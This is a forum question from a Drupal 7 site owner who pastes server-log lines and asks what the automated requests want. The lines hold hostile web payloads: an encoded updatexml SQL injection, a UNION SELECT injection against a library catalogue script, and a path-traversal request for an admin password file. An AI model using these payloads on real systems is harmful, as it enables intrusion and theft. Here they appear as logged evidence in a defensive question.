What are they trying to do with these requests out of Microsoft network?

by Max57   Last Updated April 16, 2018 10:07 AM

while checking the server logs for one of my D7 websites I found these entries:

*52.224.70.96 - - [08/Apr/2018:17:12:51 +0200] "POST /?q=user/login HTTP/1.0" 301 253 "-" "Ruby"

52.224.51.136 - - [08/Apr/2018:17:12:51 +0200] "GET /?f=search&m=index&keyword=aaa%2527%256F%2572%2520%2575%2570%2564%2561%2574%2565%2578%256D%256C%2528%2531%252C%2563%256F%256E%2563%2561%2574%2528%2531%252C%256D%2564%2535%2528%2531%2529%2529%252C%2531%2529%2523 HTTP/1.0" 301 457 "-" "Ruby"

52.234.224.191 - - [08/Apr/2018:17:12:51 +0200] "GET //?f=search&m=index&keyword=aaa%2527%256F%2572%2520%2575%2570%2564%2561%2574%2565%2578%256D%256C%2528%2531%252C%2563%256F%256E%2563%2561%2574%2528%2531%252C%256D%2564%2535%2528%2531%2529%2529%252C%2531%2529%2523 HTTP/1.0" 200 7275 "-" "Ruby"

52.234.224.191 - - [08/Apr/2018:17:12:52 +0200] "GET /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php HTTP/1.0" 301 298 "-" "Ruby"

52.226.71.1 - - [08/Apr/2018:17:12:52 +0200] "GET /opac/search_rss.php?location=ALL%27%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(118)%7C%7CCHR(112)%7C%7CCHR(122)%7C%7CCHR(113)%7C%7CCHR(100)%7C%7CCHR(108)%7C%7CCHR(98)%7C%7CCHR(104)%7C%7CCHR(120)%7C%7CCHR(71)%7C%7CCHR(112)%7C%7CCHR(105)%7C%7CCHR(108)%7C%7CCHR(81)%7C%7CCHR(113)%7C%7CCHR(122)%7C%7CCHR(120)%7C%7CCHR(113)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&title=ccc&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&sort=CATA_DATE&onlylendable=yes&with_ebook=&with_ebook= HTTP/1.0" 301 826 "-" "Ruby"

13.72.105.97 - - [08/Apr/2018:17:12:52 +0200] "GET //opac/search_rss.php?location=ALL%27%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(118)%7C%7CCHR(112)%7C%7CCHR(122)%7C%7CCHR(113)%7C%7CCHR(100)%7C%7CCHR(108)%7C%7CCHR(98)%7C%7CCHR(104)%7C%7CCHR(120)%7C%7CCHR(71)%7C%7CCHR(112)%7C%7CCHR(105)%7C%7CCHR(108)%7C%7CCHR(81)%7C%7CCHR(113)%7C%7CCHR(122)%7C%7CCHR(120)%7C%7CCHR(113)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&title=ccc&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&sort=CATA_DATE&onlylendable=yes&with_ebook=&with_ebook= HTTP/1.0" 404 6093 "-" "Ruby"

52.226.73.161 - - [08/Apr/2018:17:12:52 +0200] "GET //zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php HTTP/1.0" 404 5841 "-" "Ruby"*


Any idea what those requests are trying to obtain in Drupal?

Thanks

Max

Tags : security


Related Questions



Trying to make my entire site https

Updated April 21, 2015 04:03 AM


Blind SQL Injection. How to solve?

Updated March 19, 2016 08:03 AM

Drupal security ACL

Updated April 14, 2015 02:32 AM